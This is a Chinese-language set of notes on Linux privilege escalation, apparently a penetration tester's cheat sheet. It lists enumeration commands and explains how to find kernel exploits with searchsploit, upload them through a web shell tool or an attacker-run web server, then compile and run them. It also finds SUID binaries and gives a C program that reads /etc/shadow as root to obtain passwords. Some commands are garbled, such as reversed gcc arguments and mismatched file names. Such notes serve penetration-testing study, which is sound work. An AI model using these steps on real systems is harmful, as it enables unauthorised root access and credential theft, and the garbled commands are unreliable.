uname -r    查看内核版本

uname -a    打印有用信息

uname -m   查看系统内核

hostname    系统主机名

lsb_release -a  查看发行版本程序运行服务

1.2、linux常用命令

2.用户和群组

cat /etc/passwd      列出系统上的所有用户

cat /etc/group        列出系统上的所有组

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'  列出所有超级用户账号

w 目前已登录，他们在做什么

last              最后登录列表

3.用户和权限信息：

whoami 当前用户

id 当前用户权限

sudo –l          当前用户

4.环境变量

env               显示环境变量

set               现实环境变量

echo %PATH        路径信息

history           显示当前用户的历史命令记录

pwd                 输出工作目录

cat /etc/profile   显示默认系统变量

cat /etc/shells    显示可用的shell

dpkg –l           查看安装软件

通过uname -a和lsb_release –a获取发行版本和内核版本，

反弹shell

通过kali的searchsploit linux ubuntu 3查找相应的漏洞

将相应的poc上传至目标服务器，此时可以通过菜刀或者命令方式将poc上传到/tmp

或者攻击者搭建apache服务将pc上传到var/www/html，目标机子进行下载，然后gcc -o 37292.c exp

chmod 777 ./ecp   #给予最高权限

./exp

注意：在目标没有gcc的情况下可以进行安装后在删除，如果安装不了，最好找一个和目标机子一样的版本和内核进行编译

SUID定义为授予用户临时权限，使其具有文件所有者（而不是运行它的用户）的权限来运行程序/文件。简而言之，用户在执行文件/程序/命令时将获得文件所有者的权限以及所有者UID和GID。

sudi作用：

Linux执行程序是以当前用户权限来运行，但对于一些特殊的指令，就需要用到 suid权限。例如普通用户修改个人密码需要用到 passwd命令，我们知道 /etc/passwd文件中每一行都存储着用户的一些基本属性，如用户名、口令、用户标识号、组标识号、注释性描述、主目录、登录Shell等信息。

常见的可用于SUID提权命令

Vim

Find

Bash

More

Less

Cp

Chmod

Mv

Man

本地查找符合条件的文件：

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

suid权限仅对二进制程序有效，执行者对该程序具有x的可执行权限，才可以利用suid权限

此权限仅在执行该程序的过程中有效。

查看是否具备SUID权限(SUID权限的符号是s)

实操

#include

#include

int main()

 {

setuid(0);//run as root

system("id");

system("cat /etc/shadow");

}

以root权限进行编译和权限设置

gcc exp.c –o suexp

chmod 4755 ./suexp

以低权限运行获取账号密码

尝试使用查看/etc/passwd和/etc/shadow

用获取到的密码尝试进行root登录

#!/bin/bash

echo "===================================="

echo "=====查看内核版本====="

uname -a

echo "===================================="

echo "=====查看系统内核====="

uname -m

echo "===================================="

echo "=====系统主机名======="

hostname

echo "====================================="

echo "=====查看发行版本程序运行服务====="

lsb_release -a

echo "====================================="

echo "=====网络======="

ifconfig

https://mp.weixin.qq.com/s/7fdT2eIDSUHRcHwxoN5X-w

https://mp.weixin.qq.com/s/KlQn69OnJNL-1yC2jtZBcg

https://www.cnblogs.com/bmjoker/p/9167260.html

https://mp.weixin.qq.com/s/uk0qSfGA4yaj7ioQYmln-g